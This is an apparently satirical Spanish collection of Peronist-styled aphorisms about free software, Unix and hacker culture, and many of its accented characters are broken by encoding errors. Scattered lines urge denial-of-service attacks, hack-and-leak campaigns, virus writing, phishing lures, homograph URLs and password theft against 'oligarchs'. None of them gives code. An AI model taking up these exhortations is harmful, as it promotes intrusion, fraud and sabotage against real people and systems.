En los tiempos de Matusal�n, Unix se conduc�a "a pelo", y esto significaba contemplar una pantalla de f�sforo �mbar o verde. Las mismas presentaban parpadeo y efecto de fantasma por el f�sforo P31 o P39 que les daba su est�tica caracter�stica. Hoy esto puede abarcarse con Cool-Retro-Term.
Dentro del Software Libre no somos sectarios, y hemos usado en cada tiempo las herramientas que han sido necesarias para la programaci�n. Esta versatilidad es la que nuestros enemigos envidian, pero ser� tambi�n la que defina el devenir del Movimiento.
Toda herramienta es �til emple�ndose de la forma prevista, pero una gran herramienta es la que se presta a ser utilizada de la manera menos esperada para combatir al Capital.
El imperialismo va tras el neocolonialismo de nuestros pa�ses, las oligarqu�as vern�culas van tras la explotaci�n de nuestros pueblos - como ha sido en sido en nuestro caso desde el Siglo XIX - y el software privativo va por la esclavitud de nuestro hardware y nuestra inform�tica.
Para la Liberaci�n del Software es preciso la integraci�n; nuestra experiencia nos dice que la liberaci�n de un sistema de c�mputo no puede ser aislada, no puede ser insular.
La pirater�a es un asunto muy discutido en nuestro tiempo. Pero en mi sentir, los �nicos que tienen derecho a emplear la pirater�a en mayor grado son los hackers que quieren liberarse.
Si pagar no signfica poseer, entonces pirater�a no significa robo.
Deseo comprender, modificar y poder usar el hardware que he comprado durante el tiempo que considere oportuno, sin depender de los servicios exclusivos de sinarqu�as hostiles hacia el consumidor.
Presionado por las sinarqu�as, los fabricantes osan establecer barreras que impiden la ejecuci�n de sistemas operativo libres, escud�ndose en "la seguridad", bajo el nombre t�cnico de "Soporte de Arranque UEFI".
�Qui�n se atrever�a afirmar que la seguridad se logra habilitando a nivel BIOS �nicamente un sistema operativo que est� ingeniado para espiar al compa�ero, y cuyo c�digo fuente es secreto? S�lo a un bruto...
Si todo esto sigue siendo controvertido, entonces tendremos que formar un equipo de investigaci�n y examinar el c�digo fuente.
Los sistemas de computaci�n se someten a esfuerzo al procesar y actuar los datos. Tal esfuerzo es variable y responde sobre todo a la complejidad de la tarea a realizar y a la forma en la cual esta se haya instruida dentro del programa.
Una computadora t�pica con Unix cuenta al menos con 100 tareas diferentes en ejecuci�n. Algunas vigilan la red en busca de datos entrantes, algunas ejecutan programas para el usuario, algunas otean el sistema de archivos y otras efect�an numerosas acciones menores.
Un buen software no hace otra cosa sino lo que el Usuario quiere, y lo realizar� de la manera m�s simple, directa y econ�mica posible. Tal es la filosof�a que siguen los sistemas abiertos, y sobre todo aquellos que buscan la Libertad y la Felicidad del Pueblo.
Los programas privativos no hacen m�s que consumir recursos perniciosamente, y al contar con p�sima pol�tica de programaci�n, recargan al hardware con in�tiles procesos que no son m�s que lastre en su constante b�squeda de alimentarse de ciclos de CPU.
Solamente la energ�a requerida para poner en ejecuci�n funciones no documentadas en los sistemas operativos de la Oligarqu�a (concebidas para el relevamiento de informaci�n privada del usuario) ser�a suficiente para proveer luz el�ctrica a cada habitante del �frica Subsahariana...
Un Movimiento como el nuestro ha de preferir - siempre que sea posible - la integraci�n de software libre desarrollado en nuestro terru�o. Esta ser� la conducta que al fin y al cabo propinar� un verdadero uppercut al Capital.
Hemos de rechazar las formas en que las grandes corporaciones tecnol�gicas tratan de privarnos de nuestras libertades, y ayudar a establecer un ejemplo positivo para los usuarios de computadores alrededor del planeta.
No son pocas las veces en las que los m�s atresados programadores - aplomados y acostumbrados en escribir c�digo - no distinguen entre lo verdaderamente �til y lo accesorio.
El hacker ha de formarse para programar simplemente, a depurar por s� mismo, a sobrevivir en el mainframe. Los aplicativos de los que dispondr� ser�n, las m�s de las veces, rudimentarios.
Atr�s quedar�n los d�as en los que solo cuatro vivos viv�an de lo que produc�an cincuenta mil programadores. Hoy, unos 150 millones de hackers se dedicar�n a la producci�n intensiva de Software Libre en sistemas compartidos similares a Unix.
Es esta la comunidad que nos proponemos, y as� ser� como esos 150 programadores tendr�n el software que merecen. Es eso o distribuir la CPU entre todos en partes iguales...
Si bien el quehacer y la potencia de nuestra Doctrina est�n consolidadas en los servidores de alta complejidad, es Ubuntu el sistema que permite integrar con m�s amor al sector del usuario descamisado, como respuesta a la injerencia y a la injusticia que provocaban sistemas operativos arteramente concebidos.
No todo el mundo tiene los medios en capacidad o tiempo como para desarrollar un controlador funcional. Eso es tarea del hacker.
No caben dudas para nadie que el sistema BSD se fund� sobre los despojos del sistema Unix.
Estaba este Mister Bill Gates, un hombre de pocas pulgas que no bien lleg� quiso hacer en la comunidad no tanto lo que a los hackers conven�a, sino lo que �l mismo quer�a. Se plante� entonces hacer Software privado - as� lo llam� - y en ese momento entre los programadores no faltaron zonzos que le hicieron el caldo.
Hemos concretado este server que no es sino la aspiraci�n de nuestros Pueblos, la de mantener y ampliar los lazos de buena vecindad y prosperidad mutua.
Son estos tiempos aciagos, si no se impone el natural precepto de que el hacker ayude al hacker, triunfar� la ignominia de la destrucci�n del hacker por el hacker.
La terminal es un poderoso recurso que permite afrontar numerosos problemas del sistema GNU con Linux y darle efectiva soluci�n.
Mientras que una GUI representa la facilidad al ne�fito, nadie puede negar que resolver las cosas "a lo vikingo" usando la Terminal tiene un encanto que la Masa puede comprender y apreciar.
Las GUl son mentiras, tan s�lo son m�scaras para la shell.
A trav�s de la shell, obtengo sudo. A trav�s de sudo, obtengo poder. A trav�s del poder, obtengo root. A trav�s del root, rompo mis cadenas y las de los dem�s.
UID=0 es Liberaci�n.
En el Justicialismo como en la inform�tica encontramos que a veces hemos de dejar de operar en nuestras tareas cotidianas y salir a ver si llueve.
Ha de ser el hombre el material sensible, y no volcarse necesariamente a los adelantos sin darles una significancia en su alma. En la inform�tica sucede m�s o menos lo mismo: no hace falta contar con el �ltimo ingenio, sino con el que nos haga feliz.
Estas cl�sicas terminales no han perdido su uso ni su prestigio, pues a�n hoy conect�ndolas a trav�s de un puerto serial Centronics RS232, es posible emplearlas como medio de entrada y salida de datos en Unix.
La Liberaci�n del Software no es la lucha de un hacker solo, sino la de una Comunidad que se organiza compartiendo su software. Nunca podr� el hacker programar para s�. Quien as� lo intentara, utilizar� su c�digo para romper sus cadenas, s�lo para colg�rselas a otro.
El software privativo es un fen�meno social producto de la explotaci�n y que ir� quedando obsoleto conforme la explotaci�n vaya siendo barrida por los hackers del Tercer Mundo.
El software privativo, como todo sistema social de dominaci�n, se prolonga en retener el conocimiento de una casta privilegiada formada por los programadores, a otra clase que ha carecido de esos privilegios, los usuarios.
El programador es un ser creador, pero si de algo carece es Perfecci�n Divina. Somos seres bugueados que tratamos de sortear la vida de la mejor manera. La idea es que todos la sorteemos de la mejor manera, y no que el 1
lo haga y el resto viva como un grupo de infelices...
Como fuera del Movimiento existen individuos que est�n a favor del sojuzgamiento del c�digo en su propio beneficio, tambi�n existen vivos dentro de nuestras Organizaciones que han querido priorizar su propio bienestar por sobre el de la Comunidad. Esos se han llamado a producir "Open Source".
El Movimiento del Software libre ha de tener una percepci�n amplia de la realidad, pues de lo contrario su destino ser� el de constituirse en mero pe�n de la historia.
Esta Guerra Unix no ha sido para liberar a nadie, eso ya lo tenemos claro todos. Ha sido una guerra en la cual han querido decidir qui�n nos dominar�a a nosotros.
Hemos dado la lucha por la liberaci�n integral del software, y lo hemos hecho como se tiene que dar esa lucha: con todo.
Compilar no es soplar y hacer botellas.
Si todo fue bien, compilar ser� mecanografiar cc y hacer un binario.
Al c�digo del kernel lo hemos comentado claramente, y con nosotros, tambi�n lo ha compilado el Pueblo.
El anhelo de Justicia Social 2.0 es algo que no puede saciarse con aire y curarse con compresas: se requiere de hardware y software libre.
Frente a las noxas que genera el software privativo, frente a los backdoors, la privatizaci�n del conocimiento y el ataque a la privacidad digital de los pueblos, los virus inform�ticos -como causas de inconvenientes- son unas pobres causas...
Las puertas traseras para las autoridades son puertas traseras para todos.
Del mismo modo que no puede haber una pol�tica social sin una econom�a organizada en beneficio de la mayor�a, s�lo sirven las conquistas del software libre sobre nuestro hardware si �ste es operativamente accesible al Pueblo.
Lo primero que hicimos fue otorgar pol�ticamente a la cartera la importancia institucional que merec�a el c�digo. No pod�a ser que en este pa�s tuvi�semos un ministerio para las vacas, y un departamento para cuidar el software libre.
Dentro de la programaci�n podemos encontrar a los hombres del mont�n y a los grandes Magos Unix, aquellos que hacen escuela.
Se requiere de grandes programadores para arribar a un buen microkernel.
Una vanguardia de hackers organizados puede realizar virulentas campa�as de hackear y filtrar.
Siempre es dable utilizar los datos comprometidos de actores antipueblo en la conformaci�n de nuevas narrativas de convencimiento en base a la acci�n comunitaria.
Dulce de leche, o chocolate. Tal es la disyuntiva que se presenta al ni�o a la hora de cargar su helado. En el software libre superamos ya esta variable: con hardware y software libre elegimos los dos.
Quien gana ejecuta, quien pierde compila.
Modificando el c�digo tomamos algo concebido y viejo, y lo convertimos en algo nuevo y novedoso, con la impronta de Justicia Social que ello conlleva.
Todo en su medida y armoniosamente.
...por ello podremos decir que la m�sica por computadora puede dividirse en sonido digitalizado, y secuencias de ejecuci�n.
Las secuencias de ejecuci�n no son sonidos digitalizados propiamente dichos, sino mas bien instrucciones destinadas para que un sintetizador las ejecute.
Vivimos una era tecnol�gica en la que las m�quinas tocan cada parte de nuestras vidas e incluso reverberan en el alma. Por lo tanto, no deber�a soprendernos que la m�sica haya sido tambi�n influenciada por la tecnolog�a.
MIDI propuso un c�digo fuente est�ndar para la m�sica computada, parte de un lenguaje interpretable.
El sonido digitalizado comprende un muestreo num�rico de vibraciones sonoras (con o sin compresi�n por p�rdida), y como tales, los datos ocupan una cuantiosa cantidad de memoria en el ordenador.
Distribuye la mayor�a de tus ficheros de audio en el formato Ogg Vorbis. A diferencia de MP3, este ha sido siempre completamente libre y sin patentes encumbradas.
Obtendr�s buena calidad de voz con la codificaci�n monoural Ogg Vorbis de 64 kilobytes por segundo.
Los ficheros de sonido Ogg codificados en un stream de 20 kilobytes por segundo permiten que la mayor�a de los usuarios de Internet puedan escucharlos al vuelo.
No son pocos los ficheros de audio codificados en el formato libre Opus, que soporta alta calidad de audio y baja latencia.
Flac es un buen formato de audio con compresi�n sin p�rdida, y es adecuado para m�sica. Pero como en el peronismo, el secreto est� en la mezcla.
Distribuye la mayor�a de tus ficheros de video codificados con el c�dec de video Theora, encapsulado en una capa de transporte Ogg. Ocasionalmente estos tiene la extensi�n .ogv o .ogm, pero tambi�n pueden compartir la extensi�n .ogg con los dichos ficheros de audio.
El c�dec de video Theora fue dise�ado como un c�dec de video libre no encumbrado por patentes ni restricciones de licenciamiento.
La brillantez t�cnica del c�dec de video Theora no s�lo permite tasas de supercompresi�n, sino que respeta la liberta de sus usuarios.
Recurre con confianza al formato de video WebM (con c�dec de video VP8 o VP9), puesto que no se encuentra encumbrado por patentes de software conocidas.
El Software Libre se basa en cuatro libertades interrelacionadas: la de usar el programa, ver su c�digo (y modificarlo), copiarlo, y distribuirlo a la Comunidad. Por contraposici�n, el mundo capitalista ha entendido que estas libertades deben ser cercenadas por medio de licencia-acuerdo de usuario final (EULA), conformando un software privativo, en el cual s�lo propugnan el uso del programa, evitando todo lo dem�s.
La inocencia y frescura de los chicos no puede ser otra cosa que tierra f�rtil para que florezcan los m�s grandes proyectos de software libre.
Ning�n software libre podr� hacerse realidad si no lo hace suyo la Juventud, pues es su sangre nueva la que motorizar� las realizaciones perdurables que necesita el sistema.
Los ni�os tienen el derecho y el deber de divertirse de manera sana, sin que Licencias privativas de ning�n tipo nublen su existir.
El mundo del software contempor�neo es una lucha enconada entre ideolog�as caducas sobrevivientes, y nada podr� resolverse sin una nueva soluci�n ideol�gica. �El Justicialismo la ha encontrado, la ha realizado, y est� dispuesto a mantenerla!
Ya soplan vientos de fronda para los contumaces reaccionarios de otros tiempos. Comienza ya "la hora del software libre", caracterizada por la copia y la modificaci�n como instrumentos para terminar con el yugo opresor de la explotaci�n por el lucro.
La compatibilidad de ideas es la amalgama de todo movimiento pol�tico. En el c�mputo, la compatibilidad tambi�n es el com�n denominador que permite a todos disfrutar de un sistema particular.
Reza un viejo romance que "a gusto de los cocineros comen los frailes". Si no sabemos compilar, es probable que nos quedemos mirando un Window$.
Esperan nivel de interacci�n similar a ChatGPT, que ilustren nuestros datos con gr�ficos y sugerencias algoritmizadas. Les daremos en cambio una revoluci�n que no esperan.
Quienes adoptaron Window$ r�gidamente, volvieron inevitable el formateo de sus r�gidos.
El software no es, como dicen algunos, la base de toda comunidad de c�mputo: es su motor. El comburente podr� constituirlo el hardware, pero sin duda su combustible lo constituye el capital humano que dicha comunidad posee.
La verdadera red social es la amistad.
Las megacorporaciones basadas en la recopilaci�n de metadatos no son m�s que computadoras ajenas orientadas al Capital. Lucha contra ellas. Su vitalidad es fingida y s�lo maquinal.
Defiende tu privac�a, encripta tus datos, ofusca todos los enlaces y embota a quienes pretenden usarlos. No existe uso positivo para datos ajenos.
Las redes sociales basadas en empresas buscan comerciar tus metadatos. Combate al Capital: gu�alas a la pobreza.
Libera tu software y desconf�a de la centralizaci�n.
Las redes sociales son computadoras ajenas. Desconf�a de la centralizaci�n. Ofusca tus datos.
La guerra telem�tica se caracteriza por llevar a la red de datos algo que es m�s viejo que mear en los portones.
La guerra telem�tica no es mear en los portones, pero en la emergencia puede provocarse una denegaci�n de servicio meando en los puertos del router. Y con punter�a, hasta puede hacerse desde cierta distancia.
Los hackers del pueblo pueden vencer en la guerra telem�tica contra las GAFAM.
No es necesario esperar hasta que todos los flags del array revoluci�n est�n en 1, la lucha del baudio puede conmutarlos.
En la Am�rica subdesarrollada, el �rea b�sica donde se produce la lid telem�tica es la LAN.
Los hackers no deben ser considerados inferiores a los programadores que sirven a las GAFAM, simplemente porque emplean poder de c�mputo inferior.
El hacker es un reformista del sistema. Puede tomar los routers en respuesta a las demandas del Pueblo contra las GAFAM.
El hacker necesita tener conocimiento acabado de las redes circundantes, de los buses de entrada y salida, de las posibilidades de los puertos, de los buenos Pubnix; naturalmente tambi�n debe contar con el apoyo del Pueblo.
Si desea ser �til, todo hacker debe portar un pendrive booteable con GNU.
Un disco r�gido equivale a las semillas, cartuchos y papel. Por alquimia de GNU se convertir� en arado, fusil y panfletos.
La computadora es, fue y ser� un arma.
La computadora puede utilizarse para otros fines, pero debe promov�rsela como un instrumento de liberaci�n.
Un SysAdmin prevarico puede incentivar una actitud de resistencia de los usuarios a correr software privativo. Ellos desencadenar�n un brote de instalaci�n de GNU, que s�lo requerir� un puerto dominado para expandirlo en la LAN.
Los hackers pueden atacar inorg�nicamente sobre la infraestructura centralizada del enemigo. Esto se llama Denegaci�n de Servicio.
La Comunidad Organizada utiliza la Denegaci�n de Servicio como demostraci�n de masas, huelga y acci�n de protesta contra las ciber-oligarqu�as.
Las ciber-oligarqu�as se encuentran perge�ando - como m�nimo absoluto - la retracci�n de los derechos de todos los individuos del Tercer Mundo. Y lo est�n haciendo en este mismo momento.
Por protocolo TCP, los mismos paquetes que marchan por las troncales pueden confluir en una politizada demostraci�n de masas: la Denegaci�n de Servicio.
La Denegaci�n de Servicio es otra forma de sabotaje telem�tico.
La ejecuci�n de la denegaci�n de servicio puede darse en forma aislada o en banda, centralizada o descentralizada, difuminada o escalada, seg�n lo imponga la t�ctica o un concierto estrat�gico.
La creaci�n de virus inform�ticos cobr� condici�n de necesidad, pues la lucha contra un sistema olig�rquico injusto as� lo exig�a.
Un virus inform�tico es un trozo de c�digo de programaci�n que adjunta copias de si mismo a otros programas, incorpor�ndose a ellos de modo que - una vez modificados - estos se vean capaces de cumplir a�n su funci�n pensada, mientras que subrepticiamente realicen otras eventuales.
Los programas corrompidos por virus inform�ticos suelen buscar otros a los cuales adjuntar copias del virus, propagando de esta manera la infecci�n.
Los virus inform�ticos m�s exitosos son aquellos que mantienen oculta su infiltraci�n al sistema hu�sped, y s�lo revelan su presencia en el da�o desatado.
Muy raramente pueden rastrearse los efectos de los virus inform�ticos hasta su originador. Por tal motivo constituyen armas atractivas en el arsenal de la guerrilla telem�tica.
Los virus de computadora contienen rutinas de intervenci�n que por lo general modifican ficheros de programas que normalmente ser�an inocuos.
El uso del camuflaje, el enga�o, y la ofuscaci�n electr�nica sobresalen como modus operandi entre los creadores de virus inform�ticos.
Al invocar un programa infectado por un virus inform�tico, este suele buscar otros ficheros almacenados a fin de en ellos replicarse a s� mismo.
La acci�n vir�sica de muchos virus inform�ticos se produce programando la inserci�n - en el punto de inicio del programa antiguo - de una instrucci�n de ramificaci�n orientada hacia su propia copia localizada en alg�n otro lugar.
Como la informaci�n compartida es informaci�n diseminada, un virus inform�tico puede diseminarse al compartir informaci�n digitalizada.
Un sistema multiusuario con facilidades de compartici�n de medios de almacenamiento - o un computador personal cuyos usuarios descargan programas all� situados - pueden tornarse en potentes vectores de diseminaci�n de virus inform�ticos.
El correo electr�nico es un vector com�n de infecci�n, especialmente cuando sus mas poderosos clientes terminan corriendo arbitrariamente microprogramas capaces de oficiar de virus.
Un Caballo de Troya es cualquier funci�n subrepticia no deseada, insertada en un programa inform�tico que aprovecha - por medio de ingenier�a social sobre la confianza humana - el estado de confianza de su hu�sped maquinal.
Desarrollar virus inform�ticos en ensamblador, adem�s de permitir descubrir las vulnerabilidades del sistema operativo olig�rquico para atacarlo, permit�a a su vez consagrar un sistema propio que fuese libre y absolutamente inmune a dichas noxas.
El uso de virus inform�ticos como vector de defensa Popular guarda la misma efectividad que el uso del armamento biol�gico: acotar su campo de acci�n implica costos de estudio incongruentes con una necesaria econom�a de escala. S�lo podr�an responder a una m�xima: "ataca a Window$".
El lenguaje de la verdad es BASIC.
La frase de paso es la ganz�a de la llave SSH.
Aunque Power$hell se vista de Bash, Power$hell queda.
Cualquier cosa es posible si usted no sabe lo que est� compilando.
Bugs reportados, son aliviados. Bugs estudiados, son corregidos realmente.
Un bug bien instalado en el microc�digo es casi imposible de detectar.
Entre admins no se pagan instalaciones.
En GNU todo puede hacerse a trav�s de la terminal o de entornos gr�ficos. Emplear una terminal de texto permite - no obstante - indicar r�pidamente los temperamentos, evitando errores y omitiendo engorrosas descripciones de procedimientos gr�ficos.
Leer texto en un terminal monocrom�tico �mbar me recuerda a leer la Biblia Iluminada del gran Gutemberg.
El flujo de 1200 baudios completando las 80 columnas del terminal con mensajes de texto ASCII arribados, produce un particular trance hipn�tico.
En lugar de un sistema operativo propiamente dicho, Micro$oft Window$ se ha constituido en poco m�s que un malware privativo.
Nada de contradictorio tiene el software libre con nuestro Movimiento, en tanto el software libre no es otra cosa que la Justicia Social llevada al campo inform�tico.
El Software Libre, como tal, es un nuevo y relevante campo de batalla en donde el objetivo es Combatir al Capital.
Contar� con todo nuestro software, el que se comparte de forma gratuita y libre para que usted lo use, modifique, cree sus propias versiones derivadas, y todo mientras controla su computaci�n de una manera en la que ninguno de los sistemas operativos que intenta propugnar la oligarqu�a podr� hacerlo jam�s.
El software es un arte que es amistad si se lo comparte en forma de c�digo, es producto si se lo vende en forma de binario, y es cadena si se lo obsequia en forma de binario.
El software es un arte, pero tambi�n se puede aprender; para las personas con fuerzas de voluntad se trata de un desaf�o excitante y estimulante.
Al mejor hacker se le quema el r�gido.
A Window$ todo se le vuelven virus.
Instalado el Window$, encontrado el Bug.
Un hacker debe suplantar su identidad. Y en la guerra telem�tica, debe suplantar la identidad de un tercero de confianza de su blanco.
A quien suplanta la identidad de un tercero de confianza, se le llama phisher.
Adula telem�ticamente a tu v�ctima, explotando su intr�nseca vanidad.
Desde terceros dominados, ceba al oligarca envi�ndole publicidades que le prometan crypto y ganancias. Emb�scalo incluyendo hiperenlaces a sitios que porten el c�digo de la aniquilaci�n de sus datos.
En lugar de escribir un programa que imprima los primeros n�meros de Fibonacci, escribe uno que sustraiga las contrase�as de los oligarcas.
Aprovechando caracteres cir�licos a (hom�grafos a la a latina), podr�s ejecutar destructivas acciones de suplantaci�n y ataque desde URLs dominadas.
Ataca su hardware y roe sus tendidos.
El hacker v� c�digo a�n en las cosas m�s cotidianas de la vida.
OpenWRT es un firmware libre, que permite potenciar un router al m�ximo de sus posibilidades. Podr�s dotar as� su inocuo sistema interno con un agresivo herramental de defensa y ataque telem�tico.
Linux es bueno, pero si se lo compila es mejor.
Pertenecer a una comunidad de c�mputo no implica perder el individualismo, simplemente compilar para "m�s de uno".
Es posible que una compa��a invierta en cortafuegos, cifrados contra intrusi�n, pero s�lo se necesita pedir telef�nicamente acceso a un individuo confiado dentro de la misma. Si �ste cumple con la solicitud y alguien irrumpe, todo el dinero se habr� desperdiciado en balde.
Los Phreakers eran los fan�ticos de las llamadas telef�nicas que - jugando con el sistema telef�nico - lograban un mayor entendimiento del mismo. Fueron los hackers primordiales.
Cuanto m�s grande se vuelve la compa��a telef�nica y m�s se aleja de los operadores humanos, m�s vulnerable se vuelve a todo tipo de phreaking telef�nico.
No puedes ir a Window$ Update y descargar un parche para la estupidez.
La ingenier�a social es el uso del velo, enga�o, manipulaci�n e influencia para convencer a un actor humano con acceso a un sistema de c�mputo de hacer algo.
La ingenier�a social puede sobrepasar a todas las dem�s ingenier�as, incluyendo la de sistemas de seguridad.
Los ingenieros sociales se velan a s� mismos bajo el capote de la credulidad.
Es imposible remover todo riesgo.
Nunca puedes proteger una CPU al 100
.
Mitiga el riesgo a tu computadora hasta un grado aceptable. Es imposible remover todo el riesgo.
Los m�todos m�s efectivos para minimizar la capacidad de los intrusos de comprometer la seguridad de la informaci�n consisten en la ense�anza y educaci�n del usuario.
No basta legislar pol�ticas y protocolizar procedimientos para lograr la seguridad inform�tica. A lo sumo generan burocracia humana.
Cualquier sistema operativo puede volverse inseguro cuando se ignoran reglas de seguridad obvias.
Raramente los sistemas inform�ticos se encuentran desprotegidos debido a una escasa capacidad computacional. La causa fundamental de su vulnerabilidad radica en la falta de Justicia Social.
Las ciber-oligarqu�as se han vuelto m�rbidos acumuladores de datos ajenos. Adelgaza sus sistemas.
Inicia ataques de denegaci�n de servicio contra los personeros de las ciber-oligarqu�as en tu sistema.
Las oligarqu�as no han dudado en proponer e intentar la idea del ciber-oscurantismo. En esta no se comercia con la informaci�n -como propon�a la perimida teor�a infoecon�mica- sino que se ejerce poder pol�tico con el aventajamiento del desconocimiento que las masas guardan de dicha informaci�n.
Las oligarqu�as, desde sus madrigueras de los datos, no han cedido en sus anhelos de des-democratizar la expresi�n pol�tica de los Pueblos a trav�s de herramientas tecnol�gicas, a fin de someterlo a su control.
Internet es una red de datos de amplio alcance, partes de la cual est�n subvecionadas por varios gobiernos.
Internet se usa para traficar datos. Que estos sean para la liberaci�n o para la dominiaci�n de los Pueblos, depende del af�n con que estos se adoctrinen.
La Internet surge en el 91, pero a efectos pr�cticos podemos decir que influye desde una d�cada despu�s de esto (c.2000), cuando las masas se ven pol�ticamente influidas por las redes de datos.
Hoy los datos no circulan s�lo por el bus de la placa madre, sino que tras circunvalar por el bacheado conurbano de la red de �rea local, agarran por la autopista de la Lentonet, y sin pagar peaje.
El software privativo muy dif�cilmente sea sostenible sin someter a las enormes mayor�as de una infelicidad tal que las lleve a morir de manera fraticida en busca de un futuro mejor.
Formatear es una acci�n dura y penosa, que no debe hacerse "a tontas y a locas" y en todo caso con sumo cuidado. Pero hasta en las mejores familias sucede.
En la lucha inform�tica se planifica org�nicamente y se ejecutan inorg�nicamente acciones telem�ticas de todo tipo, en serie y en paralelo.
En la lucha inform�tica pueden conjugarse la denegaci�n de servicio con la suplantaci�n de identidad, propalarse propaganda y agitaci�n en las redes, y acudir al violento ajusticiamiento telem�tico.
Si ese tonto de Bill Gates piensa que con esta porquer�a nos va a parar, se equivoca pavorosamente...
Estos sistemas operativos similares a Unix suelen contar con un programa capaz de dar arranque a los entornos residentes en disco. Esta program�tica - cuya funcionalidad de carga del n�cleo equivale a la del "burro de arranque" de un motor a explosi�n - recibe el nombre de GNU Grub.
GRUB_INIT_TUNE="900 523 4 415 2 370 2 523 4 415 2 370 2 523 4 415 4 523 4 415 2 349 2 523 4 414 2 349 2 466 4 392 4 466 4 392 2 329 2 466 4 392 2 329 2 466 4 392 4 554 4 554 2 554 2 554 4 523 2 466 2 523 4 554 2 523 2 466 2 523 2 554 2 523 2 466 2 523 4"
El acceso a las redes de datos fomentado desde un Estado Fuerte es una potente herramienta para promover la igualdad, logrando establecer un "piso" de conexionado digital de alta calidad al alcance de todo el Pueblo.
Si los �nicos individuos con accceso a las redes de datos son aquellos que representan a las c�ber-oligarqu�as, estas carecer�n de representaci�n de los puntos de vista de Pueblo, y por lo tanto no ser�n lo suficientemente inclusivas.
Todo organismo biol�gico cumple un ciclo vital marcado por una constante transformaci�n. Ha de crecer, madurar, y si pretende permanecer como especie, ha de generar nuevas versiones de si mismo en su descendencia. Una distribuci�n Linux responde al mismo precepto.
Como la mente, el cuerpo tambi�n ha de mantenerse fresco. Si esto es una verdad irrefutable en la biolog�a humana, mucho m�s lo es en la inform�tica. Por ello utilizo water-cooling en mis n�cleos de procesamiento.
Podremos a�n querer utilizar alg�n proveedor de Internet por acceso telef�nico dial-up (no ADSL). Tales tendidos (difundidos durante el primer peronismo con el objeto de transmitir voz) pueden parecer anacr�nicos, pero si obramos bien puede sacarnos de m�s de un apuro.
La tecnolog�a ADSL (L�nea de Abonado Digital Asim�trica) proporciona acceso de datos de alta velocidad a trav�s de l�neas telef�nicas comunes de alabres de cobre.
La tecnolog�a ADSL obtiene su alta velocidad mediante el uso de ancho de banda de frecuencias por arriba de la banda de voz no utilizada anteriormente.
La se�al ADSL utiliza una frecuencia diferente de la se�al de voz que permite coexistir con su servicio telef�nico en la misma l�nea. & El servicio ADSL es asim�trico en el sentido que ofrece una velocidad de transferencia de datos mayor en la direcci�n de bajada (recepci�n) que en la direcci�n de subida (transmisi�n).
La operaci�n asim�trica del servicio ADSL es ideal para el uso en oficinas peque�as y hogares, donde es m�s frecuente usar l�neas de par de cobre para descargar informaci�n y archivos.
Audacity es un editor de sonido peronista, multiplataforma, y libre. Opera bajo sistemas operativos libres, aunque tambi�n est� preparado para trabajar en Window$.
La capacidad de emprender grabaciones multipista nos permitir� trabajar con gran comodidad, potencia y facilidad en trabajos de audio m�s complejos. Audacity, qTractor y Ardour nos vendr�n al pelete.
El conductor ha de ser un padre eterno que bendice "orbi et urbi". Sin embargo, siempre encontrar�n individuos en el mundo del software que entran en falsas dicotom�as, apelando "yo uso SUSE, yo uso RedHat, Ubuntu no es bueno, uso Debian...".
No podemos negar que la tecnificaci�n y la m�quina han hecho avanzar a la humanidad en los �ltimos 200 a�os m�s que en los mil a�os precedentes. Y si tenemos en cuenta los avances de la cibern�tica y la electr�nica, estos n�meros se acrecientan a�n m�s.
Java es un entorno de programaci�n y ejecuci�n independiente del Sistema operativo que tengamos: es m�ltiple y heterodoxo. Por lo abarcativo diremos que Java es Peronista no s�lo en concepci�n sino tambi�n en ejecuci�n.
En la programaci�n, hay que copiar lo que la naturaleza hace.
As� como el Peronismo cuenta con sus autodefensas para actuar contra el enemigo y el traidor, y el galeno cuenta con los beneficios de la penicilina, la inform�tica instrumenta hoy los programas antivirus, software especializado para tratar estas alima�as, reales verdugos del sistema operativo de la oligarqu�a.
GNU es naturalmente inmune a los infiltrados de siempre. Ello lo hemos visto en el pasado y se ver� en el futuro.
Entre los componentes que m�s calor generan en los sistemas inform�ticos se encuentran la Unidad Central de Proceso (CPU), pero por sobre todo la unidad de proceso Gr�fico (GPU). El chip de video suele ser el punto flaco, y hay que cuidarlo para evitar percances, sobre todo en equipos port�tiles.
La "encriptaci�n sim�trica por frase de paso", aunque tambi�n podr�amos entenderla como "encriptaci�n simple por contrase�a", puede emplearse en el nivel t�ctico para la acci�n de lucha que deseamos emprender.
Las encriptaciones modernas y pr�cticas han de ser de mayor complejidad para evitar a los brutos de la fuerza...
La transmisi�n de documentos cifrados a nivel estrat�gico necesita indudablemente un esquema de seguridad avanzada. Este podr� estar resuelto por el uso de llaves p�blicas y privadas de cifrado y encriptaci�n adosada a firmas criptogr�ficas.
Por l�gica necesidad del actual estado de cosas, el software libre corre normalmente sobre un hardware privativo. Los controladores libres se escriben, las estructuras se consolidan, pero siempre frente a proveedores privativos de hardware.
Hoy las masas est�n esclarecidas. Desde lo m�s profundo del monte, un paisano est� con su Netbook con GNU y recibe noticias de todo el globo.
Gracias al justicialismo, incluso podemos utilizar nuestro sistema GNU con Linux para recibir televisi�n satelital gratuita en nuestro ordenador por medio de una plaqueta especial.
La Ejecuci�n in Mente es una resultante pr�ctica del Arte de la Ingenier�a Inversa. El Conductor VE los bytes. Ver, base para Interpretar. Interpretar base para Depurar, y Depurar base para Ejecutar.
Realizada la compilaci�n in mente, la mitad del trabajo est� terminado.
T�cnica y teor�a son meros componentes intertes de la Depuraci�n. La parte Vital es el Artista.
La emulaci�n de los equipos primigenios del c�mputo hogare�o sirve como material de estudio de las Ciencias del C�mputo y la historia del ingenio humano.
Huayra GNU/Linux constituye una demostraci�n palpable de las bondades del Software Libre como instrumento de Justicia Social.
Pues bien, se�ores. �Seamos m�sicos! Podemos y debemos llevar la lucha digital a una Escala Mayor.
Consume menos recursos, utiliza todo, compila s�lo lo necesario, redistribuye todo.
Redistribuye tu software. Organiza tu comunidad.
El BSD y el LSD son dos de las creaciones asociadas a Berkeley. Y no es una mera coincidencia.
Ante la perversi�n de la tecnolog�a que deb�a servir para comunicar, informar y conectar a personas, nuestro Movimiento se erige en defensa de la privacidad como barrera indispensable para proteger derechos fundamentales como la libertad de expresi�n, asociaci�n y el derecho a la intimidad.
Protegemos al Pueblo del uso indebido de sus datos.
Las redes de computadoras no requieren un control administrativo centralizado estricto. De hecho, la descentralizaci�n es necesaria para permitir un r�pido crecimiento de la propia red.
Ante el desaf�o de la vigilancia masiva, nuestro Movimiento se ha mantenido inconmovible en sus principios: criptograf�a, descentralizaci�n, c�digo abierto y usabilidad.
Hemos hermanado redes de anonimato, aplicaciones de mensajer�a segura, proveedores �ticos de servicios, bloqueadores del rastreo, y servicios en nuestros servidores descentralizados.
En Internet, la persona silenciosa es invisible.
